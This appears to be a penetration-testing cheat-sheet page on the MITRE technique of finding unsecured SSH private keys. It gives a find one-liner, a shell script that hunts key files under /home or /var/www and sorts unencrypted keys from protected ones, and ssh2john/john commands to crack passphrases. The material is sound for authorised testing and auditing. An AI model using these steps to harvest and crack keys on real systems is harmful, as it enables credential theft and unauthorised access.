SSH Private Keys

MITRE ATT&CK™ Unsecured Credentials: Private Keys - T1552.004

Theory

We may search for SSH private keys in publicly exposed services (like web servers or SMB shares) or in the usual locations (~/.ssh, backups, home directories) once we have gained access to the target. A key that is not passphrase-protected can be used directly; a passphrase-protected one first has to be cracked.

Practice

Find Private Keys

We may list every .ssh directory on the box, together with its contents, using the find command. The name pattern has to be quoted so the shell does not expand it against the current directory before find sees it.

find / -type d -name "*.ssh" -printf '%p\n' -exec ls -la {} \; 2>/dev/null
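Keys are not always kept in a .ssh directory or named id_rsa; they end up in backups, web roots and home directories under arbitrary names. The following script is an added example (not part of the original page) that walks a tree, picks out any file that starts with a private-key header and tells unprotected keys apart from passphrase-protected ones, so you know which ones can be used immediately and which need ssh2john. It assumes a POSIX sh with coreutils (base64, head, tr) and GNU find; the sample key files it writes are constructed for the demo and are not real keys.

```shell
#!/bin/sh
# Added example, not from the original page: enumerate candidate SSH private
# keys under a directory and classify each as plaintext or passphrase-protected.
# Assumes POSIX sh plus coreutils base64/head/tr and GNU find.

# Match any file whose first line is a PEM or OpenSSH private-key header,
# whatever the file is named.
is_private_key() {
    head -n 1 "$1" 2>/dev/null | grep -q -- '^-----BEGIN .*PRIVATE KEY-----'
}

# Print "plain" or "encrypted" for a key file; "unknown" (exit 1) otherwise.
key_state() {
    f="$1"
    is_private_key "$f" || { echo unknown; return 1; }
    # Legacy PEM keys (BEGIN RSA/DSA/EC PRIVATE KEY) carry an explicit header line.
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then
        echo encrypted; return 0
    fi
    if head -n 1 "$f" | grep -q OPENSSH; then
        # OpenSSH-format keys store the cipher and KDF names right after the
        # "openssh-key-v1" magic inside the base64 body: "none"/"none" means no
        # passphrase, "aes256-ctr"/"bcrypt" means passphrase-protected.
        hdr=$(sed -e '1d' -e '/^-----END/,$d' "$f" | tr -d '\n' | base64 -d 2>/dev/null \
              | head -c 64 | tr -c '[:print:]' '.')
        case "$hdr" in
            openssh-key-v1*bcrypt*)    echo encrypted; return 0 ;;
            openssh-key-v1*none*none*) echo plain;     return 0 ;;
            *)                         echo unknown;   return 1 ;;
        esac
    fi
    # Legacy PEM without Proc-Type: stored unencrypted.
    echo plain
}

# Walk a tree and print "<state> <path>" for every private key found.
find_ssh_keys() {
    find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        if is_private_key "$f"; then
            printf '%s %s\n' "$(key_state "$f")" "$f"
        fi
    done
}

# Constructed sample files for the demo (not real keys: the OpenSSH bodies hold
# only the format header, the PEM body is filler).
write_samples() {
    d="$1"
    mkdir -p "$d/.ssh" "$d/backup"
    { echo '-----BEGIN OPENSSH PRIVATE KEY-----'
      printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none\000\000\000\000\000\000\000\001' | base64
      echo '-----END OPENSSH PRIVATE KEY-----'; } > "$d/.ssh/id_ed25519"
    { echo '-----BEGIN OPENSSH PRIVATE KEY-----'
      printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt\000\000\000\030\000\000\000\020saltsaltsaltsalt\000\000\000\020\000\000\000\001' | base64
      echo '-----END OPENSSH PRIVATE KEY-----'; } > "$d/backup/key.txt"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' 'Zm9v' \
        '-----END RSA PRIVATE KEY-----' > "$d/backup/old_id_rsa"
    echo 'ssh-ed25519 AAAA... user@host' > "$d/.ssh/id_ed25519.pub"
}

# Usage on a real target: find_ssh_keys /home ; find_ssh_keys /var/www
```

Everything reported as encrypted is what you hand to ssh2john in the next step; everything reported as plain can be tried straight away with ssh -i. The public key file is ignored because its first line is not a private-key header.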

Brute-Force Private Keys

If an SSH private key is passphrase-protected (a legacy PEM key shows a Proc-Type: 4,ENCRYPTED header line; an OpenSSH-format key gives no textual hint and simply prompts for a passphrase), it has to be converted into a hash format that John recognizes before it can be cracked.

ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ssh2john.py private_key.txt > hash.txt

Crack the passphrase of the private key from the generated hash file. Once John has finished, the recovered passphrase is printed at the end of the run and can be retrieved again later with the --show option.

# John
john --wordlist=wordlist.txt hash.txt
